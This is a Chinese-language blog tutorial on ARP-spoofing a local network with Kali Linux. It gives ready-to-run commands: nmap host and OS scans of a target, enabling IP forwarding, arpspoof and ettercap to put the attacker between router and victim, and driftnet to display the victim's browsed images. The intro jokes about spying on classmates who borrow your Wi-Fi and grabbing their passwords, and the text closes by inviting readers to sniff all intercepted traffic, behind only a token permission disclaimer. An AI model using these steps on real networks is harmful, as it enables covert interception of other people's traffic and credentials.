制霸內網之——Kali Linux進行ARP欺騙
參考資料:http://www.freebuf.com/articles/system/5157.html
如果你附近有一位學計算機專業的同學,你樂呵呵地蹭他的網,要當心啦。你所有瀏覽的信息都可能被看到。有些網站的密碼也可能被不良同學獲取到(奸笑)。好吧,想要制霸內網,其實很簡單。
摘要:本文介紹對局域網內用戶進行arp欺騙的簡單方法。文中通過arp欺騙,監聽獲取到局域網中其他電腦網絡上瀏覽的圖片。
實驗是在攻擊主機主人許可情況下進行的,請各位同學一定要遵守法律,做一名有理想、有道德、有文化、有紀律的好青(zhong)年。
以下命令均在終端中運行。
所用工具:
- Kali Linux
- nmap
- arpspoof
- Ettercap
- driftnet
安裝Kali Linux
Kali Linux裏已經集成了很多滲透軟件。這些用到的工具不用準備,只要安裝好Kali Linux就好。網上安裝教程很多,我就不介紹啦。
尋找目標主機
ifconfig
查看自己ip地址、子網掩碼等信息。
上圖中,可以看到,本機的ip地址是:172.17.171.23 子網掩碼是:255.255.255.0
接下來掃描內網中的主機:
nmap -sP 172.17.171.0/24
根據ip地址和子網掩碼,使用nmap進行掃描。根據掃描結果,來確定目標主機。本篇目標主機ip是:172.17.171.21 。
我們還可以使用以下命令來查看目標主機的操作系統信息:
nmap -O 172.17.171.21
關於nmap介紹資料:http://jingyan.baidu.com/article/47a29f24312010c0142399f1.html
進行arp欺騙,獲取流量
先進行個小實驗:
arpspoof -i eth1 -t 172.17.171.21 172.17.171.1
使用這個命令獲取到從 172.17.171.21 發往 172.17.171.1(路由器)的流量。
流量被攔截,可以試一試,目標主機這時打不開想瀏覽的網頁。
我們想要做的是查看目標主機在線瀏覽的圖片,並且讓目標主機察覺不到。下面進行:
開啓流量轉發功能
使流量經過流程爲:
A是路由器,B是攻擊主機,C是目標主機。
1.首先開啓流量轉發功能:
echo 1 >> /proc/sys/net/ipv4/ip_forward
2.使用arpspoof/ettercap,選一個進行arp欺騙。獲取從172.17.171.1(路由器) 到 172.17.171.21(目標機)的流量。
arpspoof -i eth0 -t 172.17.171.1 172.17.171.21
ettercap -T -q -M ARP /172.17.171.21// /
3.打開另一個終端,使用driftnet進行流量監控,顯示圖片
driftnet -i eth1
小結
操作過程中發現,只能顯示部分圖片,很多圖片還是顯示不出來。
另外,獲取了所有的流量,除了看圖片還可以瀏覽所有的流量信息。使用wireshark或者其他的嗅探工具進行分析吧,have fun。